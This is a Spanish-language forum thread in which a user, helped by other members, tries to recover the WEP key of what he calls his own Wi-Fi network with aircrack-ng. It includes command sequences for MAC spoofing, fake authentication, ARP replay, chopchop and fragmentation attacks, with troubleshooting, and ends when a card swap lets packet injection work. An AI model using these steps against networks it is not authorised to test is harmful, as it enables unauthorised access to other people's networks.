Hola a todos:
De nuevo recurro a este foro para solucionar un problemilla mas, o al menos para pediros opinion.
Pues eso, estoy intentanto auditar mi red wifi, con encriptacion wep, empiezo todo bien. Pongo la interface en modo monitor, cambio la MAC a una direccion inventada por mi, hago airodump-ng eligiendo mi red con su canal, y al llegar a la fase de autentificarse con la orden o comando aireplay-ng -1 0 -e (nombre de la red) -a (direccion MAC de la AP cuya key queremos sacar) -h (direccion MAC de nuestra tarjeta cambiada) mon0
y esto es lo que responde la SHELL:
root@bt:~# aireplay-ng -1 0 -e SMC -a 00:04:E2:XXXXXXXXXXXX -h 00:1B:B1:XXXXXXXXXXX mon0
13:06:19 Waiting for beacon frame (BSSID: 00:04:E2:XXXXXXXXX) on channel 6
13:06:19 Sending Authentication Request (Open System)
13:06:21 Sending Authentication Request (Open System)
13:06:23 Sending Authentication Request (Open System)
13:06:25 Sending Authentication Request (Open System)
13:06:27 Sending Authentication Request (Open System)
13:06:29 Sending Authentication Request (Open System)
13:06:31 Sending Authentication Request (Open System)
13:06:33 Sending Authentication Request (Open System)
13:06:35 Sending Authentication Request (Open System)
13:06:37 Sending Authentication Request (Open System)
13:06:39 Sending Authentication Request (Open System)
13:06:41 Sending Authentication Request (Open System)
13:06:43 Sending Authentication Request (Open System)
13:06:45 Sending Authentication Request (Open System)
13:06:47 Sending Authentication Request (Open System)
13:06:49 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
Entiendo que los puntos finales, lo que dicen es algo asi como :
Estás lo suficientemente cerca del punto de acceso, pero ojo no demasiado porque también puede fallar.
El controlador está correctamente parcheado e instalado.
La tarjeta está configurada en el mismo canal que el AP.
El BSSID y el ESSID (opciones -a / -e) son correctos.
Si se trata de Prism2, asegúrate de que el firmware está actualizado.
Sobre la cercania o no del punto de acceso decir que el PWR que me da es de -65 a -77, creo que eso bastante señal no? ademas de que tengo mi router en una de las habitaciones del piso.
He realizado este auditoria tanto en ubuntu 11.04 y en bt 5 GNOME con arquitectura 64b.
Alguna sugerencia o ayuda? Gracias.
P.D.: Se que esto no corresponde a este hilo, pero mirando por los hilos de este foro tampoco he visto nada relacionado con BackTrack 5, pero hay foro y donde esta sobre esta distro? necesito ponerla en español, y otras cosas como instalar acrobat reader y office para poder leer manuales en esta distro.
Buenas:
Recuerda que puedes indicar muchas más opciones en aireplay-ng -1 .....
Prueba a modificar tambien el 0 por 10, 15, 20.....
Prueba a cambiar la MAC por una que sea real... (alguna vez he leido que ciertos APs discriminan si tal o cual STATION es real o no...)
Un saludo
ChimoC
P.D.: NO pongas MACs completas (te las he editado con XXXXX)
HOLA de nuevo:
Gracias chimoc por tu ayuda y perdon por lo de las MACs.
He cambiado el comando aireplay-ng -1 0 -e (Nombre de essid de la red) -a (direccion MAc del AP) -h (direccion mac de mi tarjeta, he puesto la MAC real) interface
y me ha conectado, pego la respuesta:
root@bt:~# aireplay-ng -1 0 -e SMC -a XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX mon0
14:30:51 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
14:30:51 Sending Authentication Request (Open System)
14:30:51 Authentication successful
14:30:51 Sending Association Request
14:30:51 Association successful :-) (AID: 1)
despues. en otra consola, pongo el comando siguiente aireplay-ng -3 -b MAC del AP objetivo -h nuestra mac mon0. Dice que cuando alcance los 120000 arps, que busque la clave con aircrack.
El motivo es que me devuelve lo siguiente:
waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
Saving ARP requests in replay arp-0512-143157.cap
You should also start airodump-ng to capture replies.
Read 17810 packets (got 0 ARP request and 0 ACKs), sent 0 packets... (0 pps)
Vamos que empieza a leer pero captura ningun arps.
Que debo hacer? Gracias.
hola,
prueba con un, A-2 a veces suele ser efectivo
un saludo
hola heaviloto
No entiendo lo que me dices, como seria la linea de comando con el A-2 puesto? en qué lugar lo pongo? Gracias.
Buenas:
Muchas veces el A1+A3 tarda en funcionar horaSSSSSSSSSSSSS o a veces no funciona
Prueba lo que te dice mi amigo heaviloto (que no me has traido lo de las recargas ;D ;D ;D )
Tambien puedes probar con alguno de lso atques que te describen aqui....
https://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html
https://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html
Un saludo
ChimoC
P.D.: biznaka (le los tutoriales...)
A1 = aireplay-ng -1 ...
A2= aireplay-ng -2....
A3 .....
hola,
Cita de: ChimoC en 12 Mayo 2011, 15:54 PM
Prueba lo que te dice mi amigo heaviloto (que no me has traido lo de las recargas ;D ;D ;D )
je,je, je, je, tienes razon ChimoC, merecco la bulla, ya te doy un toque y hacemos una quedada
un saludo, chavalote
copio lo que me sale a ver si lo hago bien o mal. Pondre mis pensamientos entre parentesis, espero no decir muchas tonterias, aunque diceindo tonterias es como aprendo.
root@bt:~# airodump-ng -c 6 -b 00:XX:XX:XX:XX:XX -w SMC mon0
me salen dos redes en el canal 6, aunq pongo la BSSID y el ESSID de la victima, me sale otra ademas, no se porqué.
pongo en otra consola la orden:
root@bt:~# aireplay-ng -1 10 -o 1 -e SMC -b 00:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX mon0
Y empieza de una manera ciclica a aparecer en la nueva consola lo siguiente:
16:32:59 Sending Authentication Request (Open System)
16:32:59 Authentication successful
16:32:59 Sending Association Request
16:32:59 Association successful :-) (AID: 1)
16:33:09 Sending Authentication Request (Open System)
16:33:09 Authentication successful
16:33:09 Sending Association Request
16:33:09 Association successful :-) (AID: 1)
16:33:19 Sending Authentication Request (Open System)
16:33:19 Authentication successful
16:33:19 Sending Association Request
16:33:19 Association successful :-) (AID: 1)
(Decir que no sale en la linea "sending association request" lo siguiente (ACK), que he visto que sale en los manuales y a mi no) MIentras estan saliendo de manera ciclica esto que he pegado, en la consola donde selecciono el canal 6 mas el BSSID y el SSID, sale debajo STATION la MAC de mi victima con la MAC de mi tarjeta.
Despues en otra consola, ya van 3 con esta, pongo la orden siguiente, del ataque 2:
root@bt:~# aireplay-ng -2 -b 00:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX mon0
Sale leyendo paquetes, y nada mas.
Despues si interrumpo con CONTROL + C, y pongo el ataque 3:
root@bt:~# aireplay-ng -3 -b 00:XX:XX:XX:XX:XX -h 00:XX:XX:XX:XX:XX mon0
Sale lo siguiente:
Read xxxxxx packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Que hago mal? una ultima ayudita por favor. Gracias.
hola,
que sigas leyendo, repasa los manuales que te a puesto ChimoC, y tu solito lo solucionaras, te lo aseguro
un saludo
1shell recoje datas 2shell desautentificas y 3 shell ataca
miratelo te lo an posteado tienes que entender lo que estas haciendo biznaka salu2
que lio tienes hay
ahora no no estoy con linux bt5 esta encajonada solo a testig y estoy esperandoa que habran unos compañeros haber
te lo pongo a ojo y lo mas simple posible para que lo agas y luego mirate los pdf y sus atques ok
el canal es 9 tu mac sera esta 00:23:F8:83:7B:94 y macchanger esta 00:11:22:33:44:55
estos comandos da debaja tu red pero sugiero que ledes tu mismo al icono que a veces se levanta
Citarsudo airmon-ng stop wlan0
Citarsudo ifconfig wlan0 down
Citarsudo macchanger --mac 00:11:22:33:44:55 wlan0
Citarsudo airmon-ng start wlan0
Citarsudo airodump-ng mon0
-----------CONTROL+C-------------
Citarsudo airodump-ng -c 9 --bssid 00:23:F8:83:7B:94 -w captura mon0
no cierres esa shell o lo joderas todo
otra shell2
Citarsudo aireplay-ng -1 0 -a 00:23:F8:83:7B:94 -h 00:11:22:33:44:55 mon0
cuando tede la salida le pones
Citarsudo aireplay-ng -3 -b 00:23:F8:83:7B:94 -h 00:11:22:33:44:55 mon0
ya estara recogiendo paquetes
habres otra shell3
y la atacas con
Citarsudo aircrack-ng -z *.cap
yo creo que lo puse bien pruebalo aber salu2
Hola amigos:
Seguramente sere un cateto, pero sigo sin poder realizar auditoria de mi red wifi.
Resulta que al hacer la autenticacion falsa con A-1, se lleva todo el tiempo intentanto conectar, y respondiendo succesfull, pero vuelve a realizar una nueva conexion, y asi ciclicamente, no dandome ninguna salido ni posibilidad de poder escribir ningun comando a no ser que abra otra consola. En la ventana donde hice anteriormente airodump-n canal del AP bssid del AP e interface, aparece las OPN y abajo aparecen vinculado o conectado mi MAC fakeada con la MAC del AP, pero repito en la consola donde hago el ataque A-1 no deja de conectarse y volverse a conectar, incluso variando de 5 en 5 el numero de que hay detras del -1 desde el 0 hasta 30, por si la configuracion del AP del router tuviera en la configuracion algun valor especifico.
En fin tengo que volver a releer el manual o hago algo mal que no salgo de este paso? Saludos y gracias por vuestra paciencia.
hola, biznaka
si, debes releeeer, aunque solo sea para saber por donde vas, yo podria ponerte aqui toda la serie de comandos, que debes utilizar y quedar como dios (cuanto sabe este tio,je je je), pero seguirias, sin enterarte, y digo yo,para que nos pegamos un curro de cojones rockeropasiempre, Zydas y yo, si todavia seguis preguntando esto, haz lo que ya te hemos recomendado, repasa bien los manuales tio, que esta mascado
http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html
para tu problema, centrate en la parte que pone,
2.- INTRODUCCION A LA SEGURIDAD WEP. Por Heavyloto.
DIFERENTES TIPOS DE ATAQUES POR COMANDOS EN WIFISLAX O WIFIWAY, EN ESTE CASO USAREMOS WIFIWAY 1.0 FINAL.
y creo que ya no te puedo decir mas, amigo biznaka,y si despues de eso tienes dudas postealas
un saludo
utiliza este progama hay uno en el foro mas actualizado pero ami no me falla
http://sourceforge.net/projects/wepcrackgui/ podrias pobarlo
en la descarga viene como usarlo
descomprimes en el escritorio
abres la carpeta y ledas dos clipt y rum en terminal
(http://imageshack.us/m/607/3440/pantallazo2k.png)
(http://imageshack.us/m/62/8561/pantallazore.png)
(http://imageshack.us/m/560/9839/pantallazo1d.png)
(http://imageshack.us/m/30/2126/pantallazo3g.png)
Hola Amigos:
Gracias a todos por vuestra ayuda. Deciros que el programa funciona perfecto. Pero como uno nacio cabezon, quiero hacerlo mediante la consola. Admitir que el programa me ha ayudado bastante a comprender mejor como va el proceso de la auditoria de redes.
Bueno el tema, sé que a lo mejor me pongo muy pesado pero voy a poneros en situacion y a ver si me ayudais a comprender qué es lo que no hago, o lo que hago mal.
Tenemos mi red con clave wep, ningun cliente conectado, y empiezo fijando mi tarjeta en el canal de mi red. Realizo una atenticacion falsa, hasta ahi todo perfecto. Despues realizo un ataque 3 y se queda a la escucha de algun ARP, pero nada ese dato no se mueve por los siglos de los siglos. INtento con un ataque 2 y nada se queda escuchando pauetes pero el ARP tampoco se mueve.
He intentado a desautenticarme para ver si al volverme asociar enviaba alguna peticion de ARP, pero como ya sabreis nada.
Lo intento con un ataque 5 de fragmentacion y tampoco nada.
Por ultimo intento con el ataque chopchop y tampoco nada.
No se que es lo que hago mal, seguramente todo, pero podeis decirme algo? Saludo y Gracias de nuevo.
Buenas:
Lo que necesitamos ver es qué tecleas en consola (no que nos digas qué ataques haces)
Hay algunos routers que son duros de roer, yo tenía uno del año del catapúm que soltaba datas cuando le daba la real gana (esquisito que es uno)
Un saludo
ChimoC
Hola amigos, en relacion al post anterior pongo lo que hago al auditar las redes y pegare ademas as respuestas que recibo:
airmon-ng start wlan0
respuesta:
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
732 NetworkManager
734 avahi-daemon
736 avahi-daemon
753 wpa_supplicant
1538 dhclient
Process with PID 1538 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Unknown brcm80211 - [phy0]
(monitor mode enabled on mon0)
ifconfig mon0
respuesta:
mon0 Link encap:UNSPEC direcciónHW 00-1B-B1-XX-XX-XX-0A-00-00-00-00-00-00-00-00-00
ACTIVO DIFUSIÓN FUNCIONANDO MULTICAST MTU:1500 Métrica:1
Paquetes RX:2459 errores:0 perdidos:0 overruns:0 frame:0
Paquetes TX:0 errores:0 perdidos:0 overruns:0 carrier:0
colisiones:0 long.colaTX:1000
Bytes RX:760498 (760.4 KB) TX bytes:0 (0.0 B)
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
Current MAC: 00:1b:b1:XX:XX:XX (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
ifconfig mon0 up
airodump-ng mon0
control+c
airodump-ng -c 6 -b 00:04:E2:XX:XX:XX -w wep mon0
abro otra consola y realizo un ataque 3:
aireplay-ng -3 -b 00:04:E2:F2:AC:24 -h 00:11:22:33:44:55 mon0
se pone a leer paquetes y el ARP a cero.
En otra consola relaizo una autenticacion falsa, ataque 1:
aireplay-ng -1 0 (tambien voy probando de 5 en 5 desde el 0 hasta el 30) -e SMC -a 00:04:E2:XX:XX:XX -h 00:11:22:33:44:55 mon0
Aqui debo decir que no se me asocia con la MAC fakeada, en la ventana en la que hicimos airodump-ng aparece de STATION ademas de la MAC fakeada, la MAC real de wlan0. Realizo otro ataque 1 con la MAC de wlan y si me asocia. Continuo por tanto con la MAC real. Total es mia la red... Decir que en la consola donde hicimos el ataque 3 sigue leyendo paquetes y ARP a cero.
En la consola donde hicimos la autenticacion falsa hago un ataque 2 para intentar inyectar reinyectar ARPs.
aireplay-ng -2 -p 0841 -b 00:04:E2:F2:AC:24 -c FF:FF:FF:FF:FF:FF -h 00:11:22:33:44:55 mon0
Se pone a leer paquetes y nada mas, y la consola del ataque 3, el arp a cero tambien y leyendo paquetes como siempre tambien.
Paro esto y realizo otro ataque 2 pero esta vez con el archivo cap que genera.
Respuesta:
aireplay-ng -2 -r replay_arp-0518-*.cap -b 00:04:E2:F2:AC:24 -h 00:11:22:33:44:55 mon0
"aireplay-ng --help" for help.
root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -2 -r replay_arp-0518-035428.cap -b 00:04:E2:F2:AC:24 -h 00:11:22:33:44:55 mon0
End of file.
Tambien pongo esta combinacion en la que pruebo con mi MAC real y pego la respuesta tambien:
root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -2 -r replay_arp-0518-035428.cap -b 00:04:E2:XX:XX:XX -h 00:1B:B1:XX:XX:XX mon0
The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:1B:B1:XX:XX:XX
End of file.
Bueno, creo que lo que queda ya es hacer lo que tenia que haber hecho, que creo que es el ataque 4, chochop creo que se llama. En la consola del ataque 2, pongo lo siguiente:
aireplay-ng -4 -h 00:11:22:33:44:55 -r replay_arp-0518-035428.cap mon0
respuesta:
root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -4 -h 00:11:22:33:44:55 -r replay_arp-0518-035428.cap mon0
End of file.
Y pruebo este mismo ataque con la MAC real y pego tambien la respuesta:
root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -4 -h 00:1B:B1:XX:XX:XX -r replay_arp-0518-035428.cap mon0
The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:1B:B1:XX:XX:XX
End of file.
Y llegados a este punto el tcpdump no lo puedo realizar. Imagino que problema estara con las direcciones MAC, o no sé qué decís vosotros? Gracias.
Buenas:
Hazlo todo con tu MAC real ya que si la falsa no se asocia pues estás haciendo el "canelo" con los demás ataques...
Un saludo
ChimoC
Hola de nuevo:
He probado con la MAC real y tampoco hay diferencia, no consigo mover los ARP de cero. Alguna sugerencia? saludos.
Hola:
Ninguna sugerencia para mover los ARPs, para que lo s datas suban? Lo que no entiendo es porque se pone un archivo .cap, para reenviar ARPs si como digo ese dato permanece a cero. Hago los pasos mas o menos bien? o hay algo q haga mal? saludos.
Quisiera lanzar una pregunta o una idea, haber si puede ser la solucion al problema de que con la aplicacion wepcrack pueda auditar redes wep, y con la aircrack no. Wepcrack esta basado en aircrack, o no tiene nada que ver la aplicacion wepcrack con la suite aircrack? Lo digo porque buscando buscando, encontre en las reseñas de la aplicacion aircrack, en el centro de software de ubuntu, que una persona comenta que puede no funcionar esta suite en tarjetas inalambricas Broadcom, que curiosamente es la mia. Puede ser ese el motivo y nos estamos comiendo el tarro innecesariamente?
Saludos
Buenas:
Prueba con otra tarjeta....hay gente que dice que las broadcom si que van bien y otros que es una kaka...
ChimoC
Hola Amigos:
Revisando el manual de wiki en español sobre aricrack-ng, me he dado cuenta, o creo, que no tengo instalado o metido el parche de inyeccion de paquetes. Meti en su dia el parche que corregia que la tarjeta se pusiera fijado en el canal -1, tambien el de ataque de fragmentacion, pero no el de inyectar paquetes.
Alguien me ayuda a como instalar dicho parche. He encontrado el parche, bcm43xx-injection-linux-2.6.20.patch, pero mi kernel es la version, 2.6.38-8. Debo meter el parche que he encontrado o deberia buscar otro cuya version sea la de la mi so?
En el caso de que sea la que he encontrado, como debería instalarlo? Gracias.
Hola Amigos:
Escribo estas lineas para decir que he SOLUCIONADO el problemas de la auditoria de redes wifi, gracias a la ayuda de todos Vds., y al amigo DVDr que me ha pasado mucha info y al final la solucion ha sido esa.
La tarjeta que trae mi portatil es la comentada Broadcom con chipset BCM4313, no inyecta paquetes con la suite aircrack-ng, comprobado con con las distros BT5 wifislax, que traen todos los parches instalados y nada, solo se queda leyendo paquetes pero sin inyectar nada. Además esta comprobado por unas tablas que, como ya he dicho, me ha pasado el amigo DVDr y confirma que mi Broadcom no inyecta paquetes.
La tarjeta nueva que tengo es, una WISACOM usb20, con chipset Realtek RTL8187 y como he dicho ba fenomenal.
Saludos y gracias a todos por vuestra ayuda.